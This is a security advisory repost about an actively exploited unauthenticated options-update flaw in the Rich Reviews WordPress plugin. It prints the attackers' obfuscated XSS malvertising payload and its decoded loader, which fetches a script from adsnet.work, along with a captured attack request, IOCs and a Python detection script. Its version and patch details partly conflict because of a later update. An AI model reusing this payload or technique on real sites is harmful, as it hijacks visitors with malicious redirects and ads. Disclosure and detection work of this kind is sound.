Update!: Rich Reviews WordPress plugin allows hackers to inject malvertising code to over 16,000 sites

NOTICE: SECURITY UPDATE – Rich Reviews plugin has been updated to version 1.8, and the security issues described below have been patched.

Tevya Washburn with the Starfish Reviews team contacted us with a new update about the Rich Reviews Plugin. Read our update blog: Rich Reviews WordPress Plugin under new ownership, Security vulnerabilities patched

His company Starfish Reviews has taken over the plugin from the original developers and updated it. Version 1.6.5 and earlier had several major security vulnerabilities that went unresolved for several years, and those vulnerabilities were being exploited to install malware on WordPress websites running the plugin.

All of the vulnerabilities have been fixed in the updated version 1.8, which includes a complete rewrite of the options interface (where the worst vulnerabilities existed).

Their detailed blog post covering the history of this plugin, its adoption, the fixes, and additional security information is on the new page for Rich Reviews. For verification, see Nuanced Media (the original owner) and its update post confirming the takeover.

The Wordfence Threat Intelligence team has released a report saying it is tracking a series of attacks against an unpatched vulnerability in the Rich Reviews plugin for WordPress.

The estimated 16,000 sites running the plugin are vulnerable to unauthenticated plugin option updates, which can be used to deliver stored cross-site scripting (XSS) payloads.

Description: XSS Via Unauthenticated Plugin Options Update
Affected Plugin: Rich Reviews
Affected Versions: <= 1.7.4
CVSS Score: 8.3 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Attackers are currently abusing this exploit chain to inject malvertising code into target websites. The malvertising code creates redirects and popup ads. Our team has been tracking this attack campaign since April of this year. You can find additional research covering this attack campaign, published by us in April and again in August of this year.

The Wordfence firewall already has built-in rules that reliably block the XSS injections in this campaign, both for Premium users and those who haven’t upgraded yet. In addition to this, we have released a new firewall rule for our Premium customers to prevent attackers from making configuration changes, such as removing the need for review approval, or defacing certain text elements.

This new Wordfence firewall rule prevents manipulation of the plugin’s settings and has been automatically deployed to our Wordfence Premium customers. The new rule will be released to free users within 30 days.

The plugin’s developers are aware of this vulnerability, but there is no patch currently available. Please see our notes on disclosure below. We recommend users find an alternative solution as soon as possible, or remove the Rich Reviews plugin from your site.

The vulnerability in this plugin is being actively exploited. The Wordfence team is seeing this in our attack data and our Security Services Team has assisted customers of the site cleaning service who have had their site compromised by an attacker who exploited this vulnerability.

The Attack Campaign

While performing forensic review of an infected site, a security analyst with the Wordfence site cleaning team identified suspicious log activity associated with the Rich Reviews plugin.

183.90.250.26 - [redacted] "POST /wp-admin/admin-post.php?page=fp_admin_options_page HTTP/1.0" 200 - "-" "-"

An interesting detail in this log entry is the admin-post.php path combined with the plugin's options page string. Requests of this shape are commonly seen where a plugin uses an is_admin() check as if it tested the user's permissions: is_admin() only reports that an admin-area script such as admin-post.php is handling the request, not that the requester is logged in or holds any capability, so an unauthenticated POST to admin-post.php passes it, as in this example from earlier this year. In the Rich Reviews case that workaround is not even necessary, because the plugin checks every incoming request for an options update regardless of path.

The payloads injected by these attackers are directly associated with a malvertising campaign we’ve reported on previously:

eval(String.fromCharCode(118,
97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99,
117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101,
109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10,
115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61,
32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59,
10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104,
116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119,
111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97,
99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110,
116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121,
84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91,
48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40,
115, 99, 114, 105, 112, 116, 41, 59));

The obfuscated payload above executes the following script:

var script = document.createElement('script');
script.onload = function() {
};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);

This XSS payload is nearly identical to those identified in this campaign before. The sourced third-party script place.js is similar to others we’ve seen in this malvertising campaign as well, which could trigger popup ads and unwanted redirects.


Indicators of Compromise (IOCs)

Our Threat Intelligence Team releases indicators of compromise where feasible so that other security vendors can add detection capability to their products and provide protection to their customers. The following are IOCs that we have observed associated with this attack campaign.

IP Addresses

The following IP addresses are linked to malicious activity against this vulnerability:

  • 94.229.170.38
  • 183.90.250.26
  • 69.27.116.3

Domain Names

  • adsnet.work – Hosts malicious scripts sourced by XSS injections.
    • Outbound DNS requests to this domain suggest a user on your network may have triggered a potentially dangerous redirect.

Database Content

Injected content will be present in the options table of your WordPress database (wp_options with the default table prefix), stored under the option name rr_options.
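To turn the log pattern from the forensic review above and the IOCs in this section into something an investigator can run, here is an added Python example (not part of the Wordfence report). It flags access-log requests that match the attack (POSTs carrying the fp_admin_options_page page string from the captured entry, or any request from the listed IPs) and checks a dumped rr_options value for injected script. The first sample log line is the entry from the report; the remaining log lines and both serialized rr_options values are constructed for this example, and the option keys in them are placeholders rather than the plugin's real field names. Treating the page string as a query parameter on arbitrary paths is an assumption drawn from the report's statement that the plugin checks every request regardless of path.

```python
import re

# IOCs published in the Wordfence report above.
IOC_IPS = {"94.229.170.38", "183.90.250.26", "69.27.116.3"}
IOC_DOMAINS = {"adsnet.work"}
OPTIONS_PAGE = "fp_admin_options_page"  # page string from the captured log entry

# Matches combined-format access-log lines and also the report's own line,
# whose timestamp appears as "[redacted]": everything between the client IP
# and the quoted request line is skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*? "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log. Line 1 is the entry from the report; the others are
# made up for this example and use RFC 5737 documentation addresses.
SAMPLE_LOG = """\
183.90.250.26 - [redacted] "POST /wp-admin/admin-post.php?page=fp_admin_options_page HTTP/1.0" 200 - "-" "-"
203.0.113.7 - - [23/Sep/2019:08:14:02 +0000] "GET /wp-content/plugins/rich-reviews/readme.txt HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Sep/2019:08:15:40 +0000] "POST /?page=fp_admin_options_page HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
203.0.113.7 - - [23/Sep/2019:08:20:11 +0000] "GET /blog/ HTTP/1.1" 200 5532 "-" "Mozilla/5.0"
"""


def scan_access_log(lines):
    """Return one finding per suspicious request, with the reasons it was flagged."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, method, path = m["ip"], m["method"], m["path"]
        reasons = []
        if ip in IOC_IPS:
            reasons.append("source IP in published IOC list")
        # Assumption: the options page string may arrive on any path, not only
        # under /wp-admin/, because the plugin inspects every request.
        if method == "POST" and OPTIONS_PAGE in path:
            reasons.append("POST to Rich Reviews options page")
        if reasons:
            findings.append({"line": lineno, "ip": ip, "path": path, "reasons": reasons})
    return findings


# Markers of an injected payload inside the serialized rr_options value:
# a raw script tag, the fromCharCode obfuscation seen in this campaign, and
# any URL on a listed IOC domain.
INJECTION_MARKERS = (
    re.compile(r"<script\b", re.I),
    re.compile(r"eval\s*\(\s*String\.fromCharCode", re.I),
    re.compile(
        r"https?://(?:[\w-]+\.)*(?:%s)\b" % "|".join(map(re.escape, sorted(IOC_DOMAINS))),
        re.I,
    ),
)


def scan_rr_options(option_value: str) -> list[str]:
    """Return the injection markers found in a serialized rr_options value."""
    hits = []
    for pattern in INJECTION_MARKERS:
        m = pattern.search(option_value)
        if m:
            hits.append(m.group(0))
    return hits


# Constructed serialized option values in PHP serialize() format. The keys are
# placeholders for this example, not the plugin's real option names.
CLEAN_RR_OPTIONS = 'a:2:{s:7:"heading";s:14:"Leave a review";s:8:"approved";s:1:"1";}'
INFECTED_RR_OPTIONS = (
    'a:2:{s:7:"heading";s:68:"Leave a review<script>eval(String.fromCharCode(118,97,114))</script>";'
    's:8:"approved";s:1:"1";}'
)


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG.splitlines()):
        print(finding)
    print("clean option:", scan_rr_options(CLEAN_RR_OPTIONS))
    print("infected option:", scan_rr_options(INFECTED_RR_OPTIONS))
```

On a live site the raw option can be exported for scan_rr_options with WP-CLI (`wp option get rr_options`) or with `SELECT option_value FROM wp_options WHERE option_name = 'rr_options'`. A clean value produces no hits; a match on the IOC domain alone is still worth a look, since the script-loading payload may have been minified or re-encoded since this report.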

Conclusion

Rich Reviews, a plugin with an estimated 16,000 users, was removed from the WordPress plugin repository in March for security reasons. The current version of the plugin contains a highly exploitable options update vulnerability that can be used to inject a stored XSS payload into vulnerable sites. We have identified a known malvertising campaign abusing vulnerable sites in order to deliver popup ads and potentially dangerous redirects.

Wordfence users, both Premium and those still on Free, are already protected from the attacks in this campaign due to the firewall's robust XSS protection. There is potential for non-XSS abuse of this vulnerability, however, which has prompted us to release a new firewall rule. Wordfence Premium users have received an automatic update containing this new rule, while free users will receive an update in thirty days.

The plugin’s developers have acknowledged the presence of these issues, but have provided an estimate of two weeks to resolve these vulnerabilities. Due to the length of this patch process and in light of the fact that the plugin has been removed from the official WordPress plugin repository, it is recommended that Rich Reviews users find an alternative solution to ensure the security of their sites.


Read more from the Wordfence report

Update:

Tevya Washburn, CEO of Starfish Reviews, also informed us that before deploying to the WordPress plugin repository, the new owners Starfish Reviews ran the updated and secured code through the Wordfence scanner on their testing site and through the SonarCloud analyzer. The WordPress.org Plugins team did its own code audit before reopening the plugin, which has now been reopened on WordPress.org.
